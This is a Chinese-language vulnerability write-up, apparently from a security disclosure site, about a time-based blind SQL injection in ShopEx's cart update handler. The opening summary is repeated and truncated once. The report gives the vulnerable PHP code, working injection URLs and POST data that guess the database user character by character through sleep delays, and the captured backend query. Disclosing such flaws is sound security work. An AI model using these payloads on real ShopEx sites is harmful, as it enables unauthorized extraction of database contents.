VULHUB ™

### 简要描述： ShopEx sql注入 ### 详细说明： 分析一下代码： ctl.cart.php: ``` function updateCart($objType='g', $key=''){ $key = str_replace('@', '-', $key); $nQuantity = $_POST['cartNum'][$objType][$key]; switch($objType) { case 'f': $oCart->member['member_lv_id'] =$GLOBALS['runtime']['member_lv']; $oCart->member['point'] = $this->member['point']; break; case 'g': break; case 'p': break; default: break; } if(!$this->objCart->updateCart($objType, $key, $nQuantity,$aError)){ echo implode('',$aError); }else{ $this->cartTotal(); } } ``` 这里对传递进来的$key进行了分解，分解完毕之后然后updateCart，如果updateCart结果不成立然后就cartTotal ``` function cartTotal(){ $this->ctl_cart(); $sale = &$this->system->loadModel('trading/sale'); $trading = $sale->getCartObject($this->cart,$GLOBALS['runtime']['member_lv'],true); $this->pagedata['trading'] = &$trading; $this->__tmpl = 'cart/cart_total.html'; $this->output(); } ``` 这里进行了获取操作，因为shopex是加密的，部分解密分析了一下，这里我们直接看 sql后台抓到的语句 发送url: http://localhost/shopex/?cart-g-2@100) or...

### 简要描述： ShopEx sql注入 ### 详细说明： 分析一下代码： ctl.cart.php: ``` function updateCart($objType='g', $key=''){ $key = str_replace('@', '-', $key); $nQuantity = $_POST['cartNum'][$objType][$key]; switch($objType) { case 'f': $oCart->member['member_lv_id'] =$GLOBALS['runtime']['member_lv']; $oCart->member['point'] = $this->member['point']; break; case 'g': break; case 'p': break; default: break; } if(!$this->objCart->updateCart($objType, $key, $nQuantity,$aError)){ echo implode('',$aError); }else{ $this->cartTotal(); } } ``` 这里对传递进来的$key进行了分解，分解完毕之后然后updateCart，如果updateCart结果不成立然后就cartTotal ``` function cartTotal(){ $this->ctl_cart(); $sale = &$this->system->loadModel('trading/sale'); $trading = $sale->getCartObject($this->cart,$GLOBALS['runtime']['member_lv'],true); $this->pagedata['trading'] = &$trading; $this->__tmpl = 'cart/cart_total.html'; $this->output(); } ``` 这里进行了获取操作，因为shopex是加密的，部分解密分析了一下，这里我们直接看 sql后台抓到的语句 发送url: http://localhost/shopex/?cart-g-2@100) or if(ascii(mid(user(),1,1))rlike(115),sleep(1%2f10),1)%23@na-updateCart.html postdata： cartNum[g][2-100) or if(ascii(mid(user(),1,1))rlike(115),sleep(1%2f10),1)#-na]=123 我系统是root@localhost用户所以第一个字母的ascii应该为114，这里首先我们给出115使其不成立 [<img src="https://images.seebug.org/upload/201502/1309495588a274371e4f4bca850ac92374961fd6.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/1309495588a274371e4f4bca850ac92374961fd6.png) 造成566毫秒 然后改为114，发送url前清空cookie，不然会造成过滤 url: http://localhost/shopex/?cart-g-2@100) or if(ascii(mid(user(),1,1))rlike(114),sleep(1%2f10),1)%23@na-updateCart.html postdata: cartNum[g][2-100) or if(ascii(mid(user(),1,1))rlike(114),sleep(1%2f10),1)#-na]=123 [<img src="https://images.seebug.org/upload/201502/13095154a74c44fff28ef3d9c3a5e9649111bca9.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/13095154a74c44fff28ef3d9c3a5e9649111bca9.png) 造成3.85秒延迟 这里解释一下为什么秒数为1/10 因为这里是一个join操作，每查询一次就会sleep一下，故而不能设置sleep过大 ，不然造成数据库挂掉了 后台抓取sql语句为 SELECT p.*,t.setting,g.score,g.brand_id,g.cat_id,g.type_id,g.image_default,g.thumbnail_pic FROM sdb_products AS p LEFT JOIN sdb_goods AS g ON p.goods_id=g.goods_id LEFT JOIN sdb_goods_type AS t ON g.type_id=t.type_id WHERE p.product_id IN (100) or if(ascii(mid(user(),1,1))rlike(114),sleep(1/10),1)#) 看到给的payload 就可以进行猜测敏感信息 ### 漏洞证明：